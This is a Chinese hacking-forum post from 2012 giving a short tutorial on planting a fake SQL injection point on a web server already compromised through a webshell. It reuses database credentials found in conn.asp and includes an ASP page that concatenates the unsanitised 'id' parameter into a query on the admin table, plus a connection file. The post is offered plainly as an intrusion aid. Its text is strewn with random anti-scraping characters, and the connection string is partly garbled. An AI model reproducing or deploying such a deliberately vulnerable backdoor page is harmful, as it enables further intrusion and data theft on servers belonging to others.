找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1990|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
+ v% `' n3 r2 H: u2 Q" b% V$ O; w+ W5 F- W( z; L
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
3 [7 Y: Q0 O. b! S  J, x+ s" V: i4 q6 z, s7 y+ `
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!5 e$ Y# Q8 S) o. r4 c0 c
6 O% K3 ^* A. v' o! C
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和  F) e1 J; V3 x5 Y

, K0 T) r" u2 \. U7 V8 i. ^密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& r# q0 H: P# l2 q& {* d0 F4 m7 c" c# A
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:  [4 g2 q6 F( w' P& v
' F, A  R! g7 T; U+ G, H1 V
程序代码( Y$ E0 O! q8 T- j( O; W9 @
<!--#include file="xx.asp"-->. {4 J: d- n9 c- }4 `) N: F) @& K
<%2 g0 i% F6 ]3 ?8 A9 R, D9 v
set rs=server.createobject("ADODB.recordset")( m0 D! }' P4 z
id = request("id")
5 t% w1 c" S9 R, j$ S4 rstrSQL = "select * from admin where id=" & id" N; N( l9 P7 w0 X
rs.open strSQL,conn,1,3
1 Y: C7 ^: H2 xrs.close. l0 Q- b% ^7 m+ ]
%>8 `  P7 l0 ?! P% d9 ]

3 B0 s  i" c) c& p3 i7 }把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在9 V5 b( _  }3 h

& o3 |, B* k0 _! s1 o2 u你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
! m6 |' |& p  }  G* P+ S3 W/ }6 \; x+ K8 |8 q0 S# J  q# O
然后就要构造一个连接数据库的文件了,代码如下:
1 S8 i; t$ B$ C7 |0 o; P+ g程序代码0 t1 X, B. c) h
<%        
6 K2 ]: {; v/ C6 _strSQLServerName = "000.000.000.000"     '服务器名称或地址
! t7 b/ f: l  U& [7 Z0 D, cstrSQLDBUserName = "sqlname"         '数据库帐号
/ M/ v9 F) L: x8 i; @  `" E( g3 NstrSQLDBPassword = "sqlpass"         '数据库密码
3 t* r- i% ]% r# M7 \2 R- P- \: gstrSQLDBName = "sqldataname"           '数据库名称
& Z* u5 {( E/ |1 z1 `3 z7 B+ pSet conn = Server.CreateObject("ADODB.Connection")
8 A. _; F% E; n$ b, b- {: AstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"3 a8 Y) g  q9 ^/ p
conn.open strCon
7 @/ f' z4 E0 E: p%>/ i1 I" r' w: q' ?% U  U

/ Y0 M/ I& s; ~8 w这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
, l( {& W& y: u$ V7 O/ ^6 B/ c' z
* N! a3 |" S% k) b, k# R就这样,正常情况下,就OK了,伪造成功……
0 B' r, g9 S0 e0 X
- f" S, I3 m4 E/ Y* P           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表